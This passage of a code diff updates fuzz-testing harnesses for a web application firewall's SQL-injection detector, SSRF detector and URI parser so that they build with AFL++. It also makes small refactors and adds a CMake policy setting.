sizeof(std::size_t); - - if (size < resource_size) { - return {}; - } - - std::string_view resource{reinterpret_cast(data), resource_size}; - data += resource_size; - size -= resource_size; - - if (size < sizeof(std::size_t)) { - return {}; - } - - const auto param_size = *reinterpret_cast(data); - data += sizeof(std::size_t); - size -= sizeof(std::size_t); - - if (size < param_size) { - return {}; - } - - std::string_view param{reinterpret_cast(data), param_size}; - - return {resource, param}; -} - -uint8_t *serialize_string(uint8_t *Data, std::string_view str) -{ - std::size_t size = str.size(); - memcpy(Data, reinterpret_cast(&size), sizeof(std::size_t)); - Data += sizeof(std::size_t); - memcpy(Data, str.data(), size); - Data += size; - return Data; -} - -std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view param) -{ - Data = serialize_string(Data, resource); - serialize_string(Data, param); - return sizeof(std::size_t) * 2 + resource.size() + param.size(); -} -// NOLINTEND(cppcoreguidelines-pro-type-reinterpret-cast) - -// NOLINTNEXTLINE -extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) -{ - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); - - auto [resource, param] = deserialize(Data, Size); - MaxSize -= sizeof(std::size_t) * 2; - - std::string resource_buffer{resource.begin(), resource.end()}; - resource_buffer.resize(std::max(resource_buffer.size(), MaxSize / 2)); - - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - auto new_size = LLVMFuzzerMutate(reinterpret_cast(resource_buffer.data()), - resource.size(), resource_buffer.size()); - resource_buffer.resize(new_size); - - auto param_idx = rng() % new_size; - auto param_size = 1 + rng() % (new_size - param_idx); - - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; - auto param_buffer = resource_buffer.substr(param_idx, param_size); - return serialize(Data, resource_buffer, param_buffer); + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +const std::vector dialects = { + "mysql", "mysql2", "postgresql", "pgsql", "sqlite", "oracle", "doctrine", "hsqldb"}; +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { sqli_detector cond{ {gen_param_def("server.db.statement", "server.request.query", "server.db.statement")}}; - auto [resource, param] = deserialize(bytes, size); + InputSplitter splitter(data, size); + auto resource = splitter.get_string(); + auto param = splitter.get_remaining(); ddwaf_object root; ddwaf_object tmp; ddwaf_object_map(&root); + + // add database statement ddwaf_object_map_add( &root, "server.db.statement", ddwaf_object_stringl(&tmp, resource.data(), resource.size())); + + // add request query parameter ddwaf_object_map_add( &root, "server.request.query", ddwaf_object_stringl(&tmp, param.data(), param.size())); - auto dialect_str = ddwaf::sql_dialect_to_string(dialect); - ddwaf_object_map_add(&root, "server.db.system", - ddwaf_object_stringl(&tmp, dialect_str.data(), dialect_str.size())); + // Check all the dialects with the same input + for (const auto &dialect_str : dialects) { + + ddwaf_object_map_add(&root, "server.db.system", + ddwaf_object_stringl(&tmp, dialect_str.data(), dialect_str.size())); - object_store store; - store.insert(root); + // create object store and evaluate condition + object_store store; + store.insert(root); - ddwaf::timer deadline{2s}; - condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + ddwaf::timer deadline{2s}; + condition_cache cache; + + // eval the sqli detector + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + prevent_optimization(result); + } return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("sqli_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/ssrf_detector/corpus/.gitkeep b/fuzzer/ssrf_detector/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/ssrf_detector/src/main.cpp b/fuzzer/ssrf_detector/src/main.cpp index 55e555219..7c0a76043 100644 --- a/fuzzer/ssrf_detector/src/main.cpp +++ b/fuzzer/ssrf_detector/src/main.cpp @@ -2,27 +2,29 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" +#include "condition/ssrf_detector.hpp" #include #include -#include "condition/ssrf_detector.hpp" - using namespace ddwaf; +using namespace ddwaf_afl; using namespace std::literals; extern "C" size_t LLVMFuzzerMutate(uint8_t *Data, size_t Size, size_t MaxSize); -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) +template std::vector gen_param_def(Args... addresses) { - ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); - return 0; + return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; } -template std::vector gen_param_def(Args... addresses) +extern "C" int LLVMFuzzerInitialize(int *argc, char ***argv) { - return {{{{std::string{addresses}, get_target_index(addresses)}}}...}; + ddwaf::memory::set_local_memory_resource(std::pmr::new_delete_resource()); + return 0; } // NOLINTBEGIN(cppcoreguidelines-pro-type-reinterpret-cast) @@ -32,7 +34,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto resource_size = *reinterpret_cast(data); + std::size_t resource_size; + std::memcpy(&resource_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -48,7 +51,8 @@ std::pair deserialize(const uint8_t *data, s return {}; } - const auto param_size = *reinterpret_cast(data); + std::size_t param_size; + std::memcpy(¶m_size, data, sizeof(std::size_t)); data += sizeof(std::size_t); size -= sizeof(std::size_t); @@ -81,10 +85,9 @@ std::size_t serialize(uint8_t *Data, std::string_view resource, std::string_view // NOLINTNEXTLINE extern "C" size_t LLVMFuzzerCustomMutator( - uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, [[maybe_unused]] unsigned int Seed) + uint8_t *Data, size_t Size, [[maybe_unused]] size_t MaxSize, unsigned int Seed) { - static thread_local std::random_device dev; - static thread_local std::mt19937 rng(dev()); + static thread_local std::mt19937 rng(Seed); auto [resource, param] = deserialize(Data, Size); MaxSize -= sizeof(std::size_t) * 2; @@ -100,17 +103,15 @@ extern "C" size_t LLVMFuzzerCustomMutator( auto param_idx = rng() % new_size; auto param_size = 1 + rng() % (new_size - param_idx); - // std::cout << "max_size: " << MaxSize << ", new_size: " << new_size << ", idx: " << param_idx - // << ", size: " << param_size << '\n'; auto param_buffer = resource_buffer.substr(param_idx, param_size); return serialize(Data, resource_buffer, param_buffer); } -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { ssrf_detector cond{{gen_param_def("server.io.net.url", "server.request.query")}}; - auto [resource, param] = deserialize(bytes, size); + auto [resource, param] = deserialize(data, size); ddwaf_object root; ddwaf_object tmp; @@ -125,7 +126,12 @@ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) ddwaf::timer deadline{2s}; condition_cache cache; - (void)cond.eval(cache, store, {}, {}, {}, deadline); + auto result = cond.eval(cache, store, {}, {}, {}, deadline); + + prevent_optimization(result); return 0; } + +// Create AFL++ main function with initialization +AFL_FUZZ_TARGET_WITH_INIT("ssrf_detector_fuzz", LLVMFuzzerTestOneInput, LLVMFuzzerInitialize) \ No newline at end of file diff --git a/fuzzer/uri_parse/corpus/.gitkeep b/fuzzer/uri_parse/corpus/.gitkeep new file mode 100644 index 000000000..e69de29bb diff --git a/fuzzer/uri_parse/src/main.cpp b/fuzzer/uri_parse/src/main.cpp index 33eadd0b2..c68d7153f 100644 --- a/fuzzer/uri_parse/src/main.cpp +++ b/fuzzer/uri_parse/src/main.cpp @@ -2,18 +2,24 @@ // dual-licensed under the Apache-2.0 License or BSD-3-Clause License. // // This product includes software developed at Datadog (https://www.datadoghq.com/). -// Copyright 2021 Datadog, Inc. - -#include +// Copyright 2025 Datadog, Inc. +#include "../common/afl_wrapper.hpp" +#include "../common/utils.hpp" #include "uri_utils.hpp" +#include -extern "C" int LLVMFuzzerInitialize(const int * /*argc*/, char *** /*argv*/) { return 0; } +using namespace ddwaf_afl; -extern "C" int LLVMFuzzerTestOneInput(const uint8_t *bytes, size_t size) +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { - // NOLINTNEXTLINE(cppcoreguidelines-pro-type-reinterpret-cast) - std::string_view uri_raw{reinterpret_cast(bytes), size}; - ddwaf::uri_parse(uri_raw); + auto uri_raw = bytes_to_string_view(data, size); + auto result = ddwaf::uri_parse(uri_raw); + + prevent_optimization(result); + return 0; } + +// Create AFL++ main function +AFL_FUZZ_TARGET("uri_parse_fuzz", LLVMFuzzerTestOneInput) \ No newline at end of file diff --git a/third_party/CMakeLists.txt b/third_party/CMakeLists.txt index ded0c4473..8c0474351 100644 --- a/third_party/CMakeLists.txt +++ b/third_party/CMakeLists.txt @@ -1,6 +1,11 @@ project(third_party) include(ExternalProject) +# Handle CMake policy CMP0135 for ExternalProject timestamp handling +if(POLICY CMP0135) + cmake_policy(SET CMP0135 NEW) +endif() + set(DOWNLOAD_SUBDIR downloads) set(INSTALL_DIR ${CMAKE_BINARY_DIR}/third_party) #get_filename_component(INSTALL_DIR ${CMAKE_BINARY_DIR}/third_party REALPATH)